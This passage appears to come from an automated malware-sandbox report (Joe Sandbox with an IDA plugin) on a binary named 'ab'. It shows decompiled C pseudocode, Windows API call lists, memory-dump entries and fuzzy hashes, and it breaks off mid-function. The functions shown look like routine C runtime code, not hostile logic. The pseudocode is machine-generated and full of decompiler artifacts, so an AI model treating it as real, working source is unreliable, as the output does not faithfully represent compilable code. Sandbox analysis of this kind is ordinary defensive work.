                          							L10:
                          							_push(_v20);
                          							_push(0x137c338);
                          							asm("sbb eax, eax");
                          							_v12 = _v12 &  !( ~_t351);
                          							_t356 = _v8 + 0xc;
                          							_v8 = _t356;
                          							_push( *_t356);
                          							E01354333(_t370, _t423, _t431, _t439, _t455, _t439, 0x351, 3);
                          							_t476 = _t477 + 0x18;
                          							if(_v8 < 0x137c2a4) {
                          								goto L2;
                          							} else {
                          								if(_v12 != 0) {
                          									E01355C8F(_t370);
                          									_t446 = _t439 | 0xffffffff;
                          									__eflags =  *(_t455 + 0x28);
                          									if(__eflags != 0) {
                          										asm("lock xadd [ecx], eax");
                          										if(__eflags == 0) {
                          											E01355C8F( *(_t455 + 0x28));
                          										}
                          									}
                          									__eflags =  *(_t455 + 0x24);
                          									if( *(_t455 + 0x24) != 0) {
                          										asm("lock xadd [eax], edi");
                          										__eflags = _t446 == 1;
                          										if(_t446 == 1) {
                          											E01355C8F( *(_t455 + 0x24));
                          										}
                          									}
                          									 *(_t455 + 0x24) = 0;
                          									 *(_t455 + 0x1c) = 0;
                          									 *(_t455 + 0x28) = 0;
                          									 *((intOrPtr*)(_t455 + 0x20)) = 0;
                          									_t250 =  *((intOrPtr*)(_t455 + 0x40));
                          								} else {
                          									_t449 = _t439 | 0xffffffff;
                          									_t495 =  *(_t455 + 0x28);
                          									if(_t495 != 0) {
                          										asm("lock xadd [ecx], eax");
                          										if(_t495 == 0) {
                          											E01355C8F( *(_t455 + 0x28));
                          										}
                          									}
                          									if( *(_t455 + 0x24) != 0) {
                          										asm("lock xadd [eax], edi");
                          										if(_t449 == 1) {
                          											E01355C8F( *(_t455 + 0x24));
                          										}
                          									}
                          									 *(_t455 + 0x24) =  *(_t455 + 0x24) & 0x00000000;
                          									_t250 = _t370 + 4;
                          									 *(_t455 + 0x1c) =  *(_t455 + 0x1c) & 0x00000000;
                          									 *(_t455 + 0x28) = _t370;
                          									 *((intOrPtr*)(_t455 + 0x20)) = _t250;
                          								}
                          								goto L20;
                          							}
                          							goto L136;
                          						}
                          						asm("sbb eax, eax");
                          						_t351 = _t350 | 0x00000001;
                          						__eflags = _t351;
                          						goto L10;
                          					}
                          					_push(0);
                          					_push(0);
                          					_push(0);
                          					_push(0);
                          					_push(0);
                          					E013496E7();
                          					asm("int3");
                          					_t472 = _t477;
                          					_t478 = _t477 - 0x1d0;
                          					_t257 =  *0x13a4018; // 0x39cca9f6
                          					_v60 = _t257 ^ _t472;
                          					_t259 = _v44;
                          					_push(_t370);
                          					_push(_t455);
                          					_t456 = _v40;
                          					_push(_t439);
                          					_t440 = _v48;
                          					_v512 = _t440;
                          					__eflags = _t259;
                          					if(_t259 == 0) {
                          						_v460 = 1;
                          						_v472 = 0;
                          						_t372 = 0;
                          						_v452 = 0;
                          						__eflags = _t456;
                          						if(__eflags == 0) {
                          							L80:
                          							E013543F7(_t372, _t431, _t440, _t456, __eflags, _t440); // executed
                          							goto L81;
                          						} else {
                          							__eflags =  *_t456 - 0x4c;
                          							if( *_t456 != 0x4c) {
                          								L60:
                          								_t266 = E01353F6D(_t372, _t431, _t440, _t456, _t456,  &_v276, 0x83,  &_v448, 0x55,  &_v468); // executed
                          								_t479 = _t478 + 0x18;
                          								__eflags = _t266;
                          								if(_t266 != 0) {
                          									__eflags = 0;
                          									_t432 = _t440 + 0x20;
                          									_t458 = 0;
                          									_v452 = _t432;
                          									do {
                          										__eflags = _t458;
                          										if(_t458 == 0) {
                          											L75:
                          											_t267 = _v460;
                          										} else {
                          											_t387 =  *_t432;
                          											_t268 =  &_v276;
                          											while(1) {
                          												__eflags =  *_t268 -  *_t387;
                          												_t440 = _v464;
                          												if( *_t268 !=  *_t387) {
                          													break;
                          												}
                          												__eflags =  *_t268;
                          												if( *_t268 == 0) {
                          													L68:
                          													_t269 = 0;
                          												} else {
                          													_t433 =  *((intOrPtr*)(_t268 + 2));
                          													__eflags = _t433 -  *((intOrPtr*)(_t387 + 2));
                          													_v454 = _t433;
                          													_t432 = _v452;
                          													if(_t433 !=  *((intOrPtr*)(_t387 + 2))) {
                          														break;
                          													} else {
                          														_t268 = _t268 + 4;
                          														_t387 = _t387 + 4;
                          														__eflags = _v454;
                          														if(_v454 != 0) {
                          															continue;
                          														} else {
                          															goto L68;
                          														}
                          													}
                          												}
                          												L70:
                          												__eflags = _t269;
                          												if(_t269 == 0) {
                          													_t372 = _t372 + 1;
                          													__eflags = _t372;
                          													goto L75;
                          												} else {
                          													_t270 =  &_v276;
                          													_push(_t270);
                          													_push(_t458);
                          													_push(_t440);
                          													L84();
                          													_t432 = _v452;
                          													_t479 = _t479 + 0xc;
                          													__eflags = _t270;
                          													if(_t270 == 0) {
                          														_t267 = 0;
                          														_v460 = 0;
                          													} else {
                          														_t372 = _t372 + 1;
                          														goto L75;
                          													}
                          												}
                          												goto L76;
                          											}
                          											asm("sbb eax, eax");
                          											_t269 = _t268 | 0x00000001;
                          											__eflags = 0;
                          											goto L70;
                          										}
                          										L76:
                          										_t458 = _t458 + 1;
                          										_t432 = _t432 + 0x10;
                          										_v452 = _t432;
                          										__eflags = _t458 - 5;
                          									} while (_t458 <= 5);
                          									__eflags = _t267;
                          									if(__eflags != 0) {
                          										goto L80;
                          									} else {
                          										__eflags = _t372;
                          										if(__eflags != 0) {
                          											goto L80;
                          										} else {
                          										}
                          									}
                          								}
                          								goto L81;
                          							} else {
                          								__eflags =  *(_t456 + 2) - 0x43;
                          								if( *(_t456 + 2) != 0x43) {
                          									goto L60;
                          								} else {
                          									__eflags =  *((short*)(_t456 + 4)) - 0x5f;
                          									if( *((short*)(_t456 + 4)) != 0x5f) {
                          										goto L60;
                          									} else {
                          										while(1) {
                          											_t272 = E0135D7A0(_t456, 0x137c32c);
                          											_t374 = _t272;
                          											_v468 = _t374;
                          											_pop(_t389);
                          											__eflags = _t374;
                          											if(_t374 == 0) {
                          												break;
                          											}
                          											_t274 = _t272 - _t456;
                          											__eflags = _t274;
                          											_v460 = _t274 >> 1;
                          											if(_t274 == 0) {
                          												break;
                          											} else {
                          												_t276 = 0x3b;
                          												__eflags =  *_t374 - _t276;
                          												if( *_t374 == _t276) {
                          													break;
                          												} else {
                          													_t443 = _v460;
                          													_t375 = 0x137c274;
                          													_v456 = 1;
                          													do {
                          														_t277 = E01355668( *_t375, _t456, _t443);
                          														_t478 = _t478 + 0xc;
                          														__eflags = _t277;
                          														if(_t277 != 0) {
                          															goto L46;
                          														} else {
                          															_t390 =  *_t375;
                          															_t434 = _t390 + 2;
                          															do {
                          																_t345 =  *_t390;
                          																_t390 = _t390 + 2;
                          																__eflags = _t345 - _v472;
                          															} while (_t345 != _v472);
                          															_t389 = _t390 - _t434 >> 1;
                          															__eflags = _t443 - _t390 - _t434 >> 1;
                          															if(_t443 != _t390 - _t434 >> 1) {
                          																goto L46;
                          															}
                          														}
                          														break;
                          														L46:
                          														_v456 = _v456 + 1;
                          														_t375 = _t375 + 0xc;
                          														__eflags = _t375 - 0x137c2a4;
                          													} while (_t375 <= 0x137c2a4);
                          													_t372 = _v468 + 2;
                          													_t278 = E0135D747(_t389, _t372, 0x137c334);
                          													_t440 = _v464;
                          													_t459 = _t278;
                          													_pop(_t393);
                          													__eflags = _t459;
                          													if(_t459 != 0) {
                          														L49:
                          														__eflags = _v456 - 5;
                          														if(_v456 > 5) {
                          															_t394 = _v452;
                          															goto L55;
                          														} else {
                          															_push(_t459);
                          															_t281 = E0135555C( &_v276, 0x83, _t372);
                          															_t480 = _t478 + 0x10;
                          															__eflags = _t281;
                          															if(_t281 != 0) {
                          																L83:
                          																_push(0);
                          																_push(0);
                          																_push(0);
                          																_push(0);
                          																_push(0);
                          																E013496E7();
                          																asm("int3");
                          																_push(_t472);
                          																_t473 = _t480;
                          																_t284 =  *0x13a4018; // 0x39cca9f6
                          																_v560 = _t284 ^ _t473;
                          																_push(_t372);
                          																_t377 = _v544;
                          																_push(_t459);
                          																_push(_t440);
                          																_t444 = _v548;
                          																_v1288 = _t377;
                          																_v1284 = E013559E0(_t393, _t431) + 0x278;
                          																_t291 = E01353F6D(_t377, _t431, _t444, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
                          																_t482 = _t480 - 0x2e4 + 0x18;
                          																__eflags = _t291;
                          																if(_t291 == 0) {
                          																	L124:
                          																	__eflags = 0;
                          																	goto L125;
                          																} else {
                          																	_t103 = _t377 + 2; // 0x2
                          																	_t463 = _t103 << 4;
                          																	__eflags = _t463;
                          																	_t294 =  &_v280;
                          																	_v720 = _t463;
                          																	_t397 =  *((intOrPtr*)(_t463 + _t444));
                          																	while(1) {
                          																		_v712 = _v712 & 0x00000000;
                          																		__eflags =  *_t294 -  *_t397;
                          																		_t465 = _v720;
                          																		if( *_t294 !=  *_t397) {
                          																			break;
                          																		}
                          																		__eflags =  *_t294;
                          																		if( *_t294 == 0) {
                          																			L91:
                          																			_t295 = _v712;
                          																		} else {
                          																			_t470 =  *((intOrPtr*)(_t294 + 2));
                          																			__eflags = _t470 -  *((intOrPtr*)(_t397 + 2));
                          																			_v714 = _t470;
                          																			_t465 = _v720;
                          																			if(_t470 !=  *((intOrPtr*)(_t397 + 2))) {
                          																				break;
                          																			} else {
                          																				_t294 = _t294 + 4;
                          																				_t397 = _t397 + 4;
                          																				__eflags = _v714;
                          																				if(_v714 != 0) {
                          																					continue;
                          																				} else {
                          																					goto L91;
                          																				}
                          																			}
                          																		}
                          																		L93:
                          																		__eflags = _t295;
                          																		if(_t295 != 0) {
                          																			_t398 =  &_v280;
                          																			_t436 = _t398 + 2;
                          																			do {
                          																				_t296 =  *_t398;
                          																				_t398 = _t398 + 2;
                          																				__eflags = _t296 - _v712;
                          																			} while (_t296 != _v712);
                          																			_v716 = (_t398 - _t436 >> 1) + 1;
                          																			_t299 = E013576ED(4 + ((_t398 - _t436 >> 1) + 1) * 2);
                          																			_v732 = _t299;
                          																			__eflags = _t299;
                          																			if(_t299 == 0) {
                          																				goto L124;
                          																			} else {
                          																				_v728 =  *((intOrPtr*)(_t465 + _t444));
                          																				_v748 =  *(_t444 + 0xa0 + _t377 * 4);
                          																				_v752 =  *(_t444 + 8);
                          																				_t405 =  &_v280;
                          																				_v736 = _t299 + 4;
                          																				_t301 = E01352808(_t299 + 4, _v716, _t405);
                          																				_t483 = _t482 + 0xc;
                          																				__eflags = _t301;
                          																				if(_t301 != 0) {
                          																					_t302 = _v712;
                          																					_push(_t302);
                          																					_push(_t302);
                          																					_push(_t302);
                          																					_push(_t302);
                          																					_push(_t302);
                          																					E013496E7();
                          																					asm("int3");
                          																					_push(_t473);
                          																					_push(_t405);
                          																					_v1336 = _v1336 & 0x00000000;
                          																					_t305 = E0135628F(_v1324, 0x20001004,  &_v1336, 2);
                          																					__eflags = _t305;
                          																					if(_t305 == 0) {
                          																						L134:
                          																						return 0xfde9;
                          																					}
                          																					_t307 = _v20;
                          																					__eflags = _t307;
                          																					if(_t307 == 0) {
                          																						goto L134;
                          																					}
                          																					return _t307;
                          																				} else {
                          																					__eflags = _v280 - 0x43;
                          																					 *((intOrPtr*)(_t465 + _t444)) = _v736;
                          																					if(_v280 != 0x43) {
                          																						L102:
                          																						_t310 = E01353C8A(_t377, _t444,  &_v708);
                          																						_t437 = _v712;
                          																					} else {
                          																						__eflags = _v278;
                          																						if(_v278 != 0) {
                          																							goto L102;
                          																						} else {
                          																							_t437 = _v712;
                          																							_t310 = _t437;
                          																						}
                          																					}
                          																					 *(_t444 + 0xa0 + _t377 * 4) = _t310;
                          																					__eflags = _t377 - 2;
                          																					if(_t377 != 2) {
                          																						__eflags = _t377 - 1;
                          																						if(_t377 != 1) {
                          																							__eflags = _t377 - 5;
                          																							if(_t377 == 5) {
                          																								 *((intOrPtr*)(_t444 + 0x14)) = _v724;
                          																							}
                          																						} else {
                          																							 *((intOrPtr*)(_t444 + 0x10)) = _v724;
                          																						}
                          																					} else {
                          																						_t469 = _v740;
                          																						 *(_t444 + 8) = _v724;
                          																						_v716 = _t469[8];
                          																						_t417 = _t469[9];
                          																						_v724 = _t417;
                          																						while(1) {
                          																							__eflags =  *(_t444 + 8) -  *(_t469 + _t437 * 8);
                          																							if( *(_t444 + 8) ==  *(_t469 + _t437 * 8)) {
                          																								break;
                          																							}
                          																							_t339 =  *(_t469 + _t437 * 8);
                          																							_t417 =  *(_t469 + 4 + _t437 * 8);
                          																							 *(_t469 + _t437 * 8) = _v716;
                          																							 *(_t469 + 4 + _t437 * 8) = _v724;
                          																							_t437 = _t437 + 1;
                          																							_t377 = _v744;
                          																							_v716 = _t339;
                          																							_v724 = _t417;
                          																							__eflags = _t437 - 5;
                          																							if(_t437 < 5) {
                          																								continue;
                          																							} else {
                          																							}
                          																							L110:
                          																							__eflags = _t437 - 5;
                          																							if(__eflags == 0) {
                          																								_t331 = E0135877D(_t377, _t437, _t444, __eflags, _v712, 1, 0x137c1e8, 0x7f,  &_v536,  *(_t444 + 8), 1);
                          																								_t483 = _t483 + 0x1c;
                          																								__eflags = _t331;
                          																								if(_t331 == 0) {
                          																									_t418 = _v712;
                          																								} else {
                          																									_t333 = _v712;
                          																									do {
                          																										 *(_t473 + _t333 * 2 - 0x20c) =  *(_t473 + _t333 * 2 - 0x20c) & 0x000001ff;
                          																										_t333 = _t333 + 1;
                          																										__eflags = _t333 - 0x7f;
                          																									} while (_t333 < 0x7f);
                          																									_t335 = E013469C4( &_v536,  *0x13a41f0, 0xfe);
                          																									_t483 = _t483 + 0xc;
                          																									__eflags = _t335;
                          																									_t418 = 0 | _t335 == 0x00000000;
                          																								}
                          																								_t469[1] = _t418;
                          																								 *_t469 =  *(_t444 + 8);
                          																							}
                          																							 *(_t444 + 0x18) = _t469[1];
                          																							goto L122;
                          																						}
                          																						__eflags = _t437;
                          																						if(_t437 != 0) {
                          																							 *_t469 =  *(_t469 + _t437 * 8);
                          																							_t469[1] =  *(_t469 + 4 + _t437 * 8);
                          																							 *(_t469 + _t437 * 8) = _v716;
                          																							 *(_t469 + 4 + _t437 * 8) = _t417;
                          																						}
                          																						goto L110;
                          																					}
                          																					L122:
                          																					_t311 = _t377 * 0xc;
                          																					_t204 = _t311 + 0x137c270; // 0x132f829
                          																					 *0x1374358(_t444);
                          																					_t313 =  *((intOrPtr*)( *_t204))();
                          																					_t409 = _v728;
                          																					__eflags = _t313;
                          																					if(_t313 == 0) {
                          																						__eflags = _t409 - 0x13a42c8;
                          																						if(_t409 != 0x13a42c8) {
                          																							_t468 = _t377 + _t377;
                          																							__eflags = _t468;
                          																							asm("lock xadd [eax], ecx");
                          																							if(_t468 != 0) {
                          																								goto L129;
                          																							} else {
                          																								E01355C8F( *((intOrPtr*)(_t444 + 0x28 + _t468 * 8)));
                          																								E01355C8F( *((intOrPtr*)(_t444 + 0x24 + _t468 * 8)));
                          																								E01355C8F( *(_t444 + 0xa0 + _t377 * 4));
                          																								_t412 = _v712;
                          																								 *(_v720 + _t444) = _t412;
                          																								 *(_t444 + 0xa0 + _t377 * 4) = _t412;
                          																							}
                          																						}
                          																						_t410 = _v732;
                          																						 *_t410 = 1;
                          																						 *((intOrPtr*)(_t444 + 0x28 + (_t377 + _t377) * 8)) = _t410;
                          																					} else {
                          																						 *((intOrPtr*)(_v720 + _t444)) = _t409;
                          																						E01355C8F( *(_t444 + 0xa0 + _t377 * 4));
                          																						 *(_t444 + 0xa0 + _t377 * 4) = _v748;
                          																						E01355C8F(_v732);
                          																						 *(_t444 + 8) = _v752;
                          																						goto L124;
                          																					}
                          																					goto L125;
                          																				}
                          																			}
                          																		} else {
                          																			L125:
                          																			_pop(_t461);
                          																			__eflags = _v16 ^ _t473;
                          																			return E0132EA79(_v16 ^ _t473, _t461);
                          																		}
                          																		goto L136;
                          																	}
                          																	asm("sbb eax, eax");
                          																	_t295 = _t294 | 0x00000001;
                          																	__eflags = _t295;
                          																	goto L93;
                          																}
                          															} else {
                          																_t341 = _t459 + _t459;
                          																__eflags = _t341 - 0x106;
                          																if(_t341 >= 0x106) {
                          																	E0132EC0C();
                          																	goto L83;
                          																} else {
                          																	 *((short*)(_t472 + _t341 - 0x10c)) = 0;
                          																	_t343 =  &_v276;
                          																	_push(_t343);
                          																	_push(_v456);
                          																	_push(_t440);
                          																	L84();
                          																	_t394 = _v452;
                          																	_t478 = _t480 + 0xc;
                          																	__eflags = _t343;
                          																	if(_t343 != 0) {
                          																		_t394 = _t394 + 1;
                          																		_v452 = _t394;
                          																	}
                          																	L55:
                          																	_t456 = _t372 + _t459 * 2;
                          																	_t279 =  *_t456 & 0x0000ffff;
                          																	_t431 = _t279;
                          																	__eflags = _t279;
                          																	if(_t279 != 0) {
                          																		_t456 = _t456 + 2;
                          																		__eflags = _t456;
                          																		_t431 =  *_t456 & 0x0000ffff;
                          																	}
                          																	__eflags = _t431;
                          																	if(_t431 != 0) {
                          																		continue;
                          																	} else {
                          																		__eflags = _t394;
                          																		if(__eflags != 0) {
                          																			goto L80;
                          																		} else {
                          																			break;
                          																		}
                          																		goto L81;
                          																	}
                          																}
                          															}
                          														}
                          													} else {
                          														_t344 = 0x3b;
                          														__eflags =  *_t372 - _t344;
                          														if( *_t372 != _t344) {
                          															break;
                          														} else {
                          															goto L49;
                          														}
                          													}
                          												}
                          											}
                          											goto L136;
                          										}
                          										goto L81;
                          									}
                          								}
                          							}
                          						}
                          					} else {
                          						__eflags = _t456;
                          						if(_t456 != 0) {
                          							_push(_t456);
                          							_push(_t259);
                          							_push(_t440);
                          							L84();
                          						}
                          						L81:
                          						_pop(_t457);
                          						__eflags = _v12 ^ _t472;
                          						return E0132EA79(_v12 ^ _t472, _t457);
                          					}
                          				}
                          				L136:
                          			}


                          APIs
                            • Part of subcall function 013576ED: RtlAllocateHeap.NTDLL(00000000,00013385,00013385,?,0135BEE9,00000220,0135F479,00013385,?,?,?,?,00000000,00000000,?,0135F479), ref: 0135771F
                          • _free.LIBCMT ref: 01354506
                          • _free.LIBCMT ref: 0135451D
                          • _free.LIBCMT ref: 0135453A
                          • _free.LIBCMT ref: 01354555
                          • _free.LIBCMT ref: 0135456C
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: _free$AllocateHeap
                          • String ID:
                          • API String ID: 3033488037-0
                          • Opcode ID: 014462a1a504dc546bdd5e8457f68d166857b1b6d1e994c17c7607d561216fe7
                          • Instruction ID: 3169d5f8380c3c3f9c73f92de62114d75da84378b9d47d6a989a070b8097b72a
                          • Opcode Fuzzy Hash: 014462a1a504dc546bdd5e8457f68d166857b1b6d1e994c17c7607d561216fe7
                          • Instruction Fuzzy Hash: 3551B172A00205DFDB69DF6DC841E6A7BF5EF58B28B040A69ED09D7650F731EA40CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 55%
                          			E01308840(void* __ebx, signed int __ecx) {
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t41;
                          				intOrPtr _t42;
                          				signed int _t61;
                          				long _t64;
                          				signed int _t80;
                          				signed int _t81;
                          				signed int _t83;
                          				signed int* _t89;
                          				void* _t93;
                          
                          				_t61 = __ecx;
                          				_push(__ebx);
                          				_t80 = __ecx;
                          				 *__ecx = 0x1396af4;
                          				_t60 =  *((intOrPtr*)(__ecx + 0x64));
                          				_t87 =  *((intOrPtr*)(__ecx + 0x60));
                          				if( *((intOrPtr*)(__ecx + 0x60)) ==  *((intOrPtr*)(__ecx + 0x64))) {
                          					L9:
                          					_push(_t61);
                          					E0130A810( *(_t80 + 0x60),  *(_t80 + 0x64));
                          					_t93 = _t93 + 4;
                          					 *(_t80 + 0x64) =  *(_t80 + 0x60);
                          					CloseHandle( *0x13a4b80);
                          					E013091A0(_t80);
                          					_t41 =  *((intOrPtr*)(_t80 + 0x80));
                          					if(_t41 >= 0x10) {
                          						_push(_t41 + 1);
                          						E012F56A0(_t60, _t80,  *((intOrPtr*)(_t80 + 0x6c)));
                          						_t93 = _t93 + 8;
                          					}
                          					 *(_t80 + 0x7c) = 0;
                          					 *((intOrPtr*)(_t80 + 0x80)) = 0xf;
                          					 *((char*)(_t80 + 0x6c)) = 0;
                          					_t64 =  *(_t80 + 0x60);
                          					if(_t64 != 0) {
                          						_push(_t64);
                          						E0130A810(_t64,  *(_t80 + 0x64));
                          						_push((((0x92492493 * ( *(_t80 + 0x68) -  *(_t80 + 0x60)) >> 0x20) +  *(_t80 + 0x68) -  *(_t80 + 0x60) >> 4 >> 0x1f) + ((0x92492493 * ( *(_t80 + 0x68) -  *(_t80 + 0x60)) >> 0x20) +  *(_t80 + 0x68) -  *(_t80 + 0x60) >> 4)) * 8 - ((0x92492493 * ( *(_t80 + 0x68) -  *(_t80 + 0x60)) >> 0x20) +  *(_t80 + 0x68) -  *(_t80 + 0x60) >> 4 >> 0x1f) + ((0x92492493 * ( *(_t80 + 0x68) -  *(_t80 + 0x60)) >> 0x20) +  *(_t80 + 0x68) -  *(_t80 + 0x60) >> 4) << 2);
                          						E012F56A0(_t60, _t80,  *(_t80 + 0x60));
                          						 *(_t80 + 0x60) = 0;
                          						_t93 = _t93 + 0xc;
                          						 *(_t80 + 0x64) = 0;
                          						 *(_t80 + 0x68) = 0;
                          					}
                          					_t42 =  *((intOrPtr*)(_t80 + 0x30));
                          					if(_t42 >= 0x10) {
                          						_push(_t42 + 1);
                          						E012F56A0(_t60, _t80,  *((intOrPtr*)(_t80 + 0x1c)));
                          						_t93 = _t93 + 8;
                          					}
                          					 *(_t80 + 0x2c) = 0;
                          					_t61 = _t80;
                          					 *((intOrPtr*)(_t80 + 0x30)) = 0xf;
                          					 *((char*)(_t80 + 0x1c)) = 0;
                          					_pop(_t80);
                          					_pop(_t60);
                          				} else {
                          					do {
                          						PostQueuedCompletionStatus( *0x13a4b80, 0, 2, 0);
                          						WaitForSingleObject( *(__esi + 0x18), 0x3e8);
                          						FindCloseChangeNotification( *(__esi + 0x18)); // executed
                          						__esi = __esi + 0x1c;
                          					} while (__esi != __ebx);
                          					goto L9;
                          				}
                          				_push(_t80);
                          				_t81 = _t61;
                          				_t65 =  *((intOrPtr*)(_t81 + 4));
                          				 *_t81 = 0x1384440;
                          				if( *((intOrPtr*)(_t81 + 4)) != 0) {
                          					E01304470(_t65, _t81);
                          				}
                          				E01304030(_t81 + 0x10, _t81 + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x10)) + 4)));
                          				_push(0x40);
                          				_t45 = E012F56A0(_t60, _t81,  *((intOrPtr*)(_t81 + 0x10)));
                          				_t89 =  *(_t81 + 8);
                          				if(_t89 == 0) {
                          					L7:
                          					return _t45;
                          				} else {
                          					_t83 = _t81 | 0xffffffff;
                          					_t45 = _t83;
                          					asm("lock xadd [esi+0x4], eax");
                          					if(_t83 != 0) {
                          						goto L7;
                          					}
                          					_t45 =  *( *_t89)();
                          					asm("lock xadd [esi+0x8], edi");
                          					if(_t83 != 1) {
                          						goto L7;
                          					}
                          					_t45 =  *_t89;
                          					goto ( *((intOrPtr*)( *_t89 + 4)));
                          				}
                          			}

                          APIs
                          • PostQueuedCompletionStatus.KERNEL32(00000000,00000002,00000000,?,?,?,0130881B), ref: 01308861
                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,0130881B), ref: 0130886F
                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,0130881B), ref: 01308878
                          • CloseHandle.KERNEL32 ref: 013088A0
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Close$ChangeCompletionFindHandleNotificationObjectPostQueuedSingleStatusWait
                          • String ID:
                          • API String ID: 915711087-0
                          • Opcode ID: 5173a33c0909f43dda5a9552999a6938b6ae4b0c0b8b15bb04b6f2df2f6c7d4a
                          • Instruction ID: 93f4ea284c4fbb499a5c47763a7dc751478739181b1435e381ca2dfc10408bc7
                          • Opcode Fuzzy Hash: 5173a33c0909f43dda5a9552999a6938b6ae4b0c0b8b15bb04b6f2df2f6c7d4a
                          • Instruction Fuzzy Hash: 0C317371610A03AFE719AF28EC64B69BFAAFF50318F444128E50197AD1C775B874CBD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 343 13559e0-13559f5 GetLastError 344 13559f7-1355a01 call 13561b7 343->344 345 1355a13-1355a1d call 13561f6 343->345 352 1355a03-1355a06 344->352 353 1355a0e 344->353 350 1355a1f-1355a26 call 1355c32 345->350 351 1355a08 345->351 358 1355a2b-1355a31 350->358 356 1355a0a-1355a0c 351->356 352->351 355 1355a80 352->355 353->345 357 1355a82-1355a8f SetLastError 355->357 356->357 361 1355a97-1355a9c call 134b472 357->361 362 1355a91-1355a96 357->362 359 1355a33-1355a41 call 13561f6 358->359 360 1355a4a-1355a58 call 13561f6 358->360 371 1355a42-1355a48 call 1355c8f 359->371 369 1355a6b-1355a7d call 135580e call 1355c8f 360->369 370 1355a5a-1355a69 call 13561f6 360->370 369->355 370->371 371->356
                          C-Code - Quality: 76%
                          			E013559E0(void* __ecx, void* __edx) {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t2;
                          				long _t3;
                          				intOrPtr _t5;
                          				long _t6;
                          				intOrPtr _t9;
                          				long _t10;
                          				signed int _t30;
                          				signed int _t39;
                          				signed int _t40;
                          				void* _t43;
                          				void* _t49;
                          				signed int _t51;
                          				signed int _t53;
                          				signed int _t54;
                          				long _t56;
                          				long _t60;
                          				long _t61;
                          				void* _t65;
                          
                          				_t49 = __edx;
                          				_t43 = __ecx;
                          				_t60 = GetLastError();
                          				_t2 =  *0x13a4200; // 0x6
                          				_t67 = _t2 - 0xffffffff;
                          				if(_t2 == 0xffffffff) {
                          					L6:
                          					_t3 = E013561F6(__eflags, _t2, 0xffffffff);
                          					__eflags = _t3;
                          					if(_t3 == 0) {
                          						goto L3;
                          					} else {
                          						_t30 = E01355C32(1, 0x364); // executed
                          						_t51 = _t30;
                          						_pop(_t43);
                          						__eflags = _t51;
                          						if(__eflags != 0) {
                          							__eflags = E013561F6(__eflags,  *0x13a4200, _t51);
                          							if(__eflags != 0) {
                          								E0135580E(_t51, 0x13ab4a8);
                          								E01355C8F(0);
                          								_t65 = _t65 + 0xc;
                          								goto L13;
                          							} else {
                          								_t39 = 0;
                          								E013561F6(__eflags,  *0x13a4200, 0);
                          								_push(_t51);
                          								goto L9;
                          							}
                          						} else {
                          							_t39 = 0;
                          							__eflags = 0;
                          							E013561F6(0,  *0x13a4200, 0);
                          							_push(0);
                          							L9:
                          							E01355C8F();
                          							_pop(_t43);
                          							goto L4;
                          						}
                          					}
                          				} else {
                          					_t51 = E013561B7(_t67, _t2);
                          					if(_t51 == 0) {
                          						_t2 =  *0x13a4200; // 0x6
                          						goto L6;
                          					} else {
                          						if(_t51 != 0xffffffff) {
                          							L13:
                          							_t39 = _t51;
                          						} else {
                          							L3:
                          							_t39 = 0;
                          							L4:
                          							_t51 = _t39;
                          						}
                          					}
                          				}
                          				SetLastError(_t60);
                          				asm("sbb edi, edi");
                          				_t53 =  ~_t51 & _t39;
                          				if(_t53 == 0) {
                          					E0134B472(_t39, _t43, _t49, _t53, _t60);
                          					asm("int3");
                          					_t5 =  *0x13a4200; // 0x6
                          					_push(_t60);
                          					__eflags = _t5 - 0xffffffff;
                          					if(__eflags == 0) {
                          						L22:
                          						_t6 = E013561F6(__eflags, _t5, 0xffffffff);
                          						__eflags = _t6;
                          						if(_t6 == 0) {
                          							goto L31;
                          						} else {
                          							_t60 = E01355C32(1, 0x364);
                          							_pop(_t43);
                          							__eflags = _t60;
                          							if(__eflags != 0) {
                          								__eflags = E013561F6(__eflags,  *0x13a4200, _t60);
                          								if(__eflags != 0) {
                          									E0135580E(_t60, 0x13ab4a8);
                          									E01355C8F(0);
                          									_t65 = _t65 + 0xc;
                          									goto L29;
                          								} else {
                          									E013561F6(__eflags,  *0x13a4200, _t21);
                          									_push(_t60);
                          									goto L25;
                          								}
                          							} else {
                          								E013561F6(__eflags,  *0x13a4200, _t20);
                          								_push(_t60);
                          								L25:
                          								E01355C8F();
                          								_pop(_t43);
                          								goto L31;
                          							}
                          						}
                          					} else {
                          						_t60 = E013561B7(__eflags, _t5);
                          						__eflags = _t60;
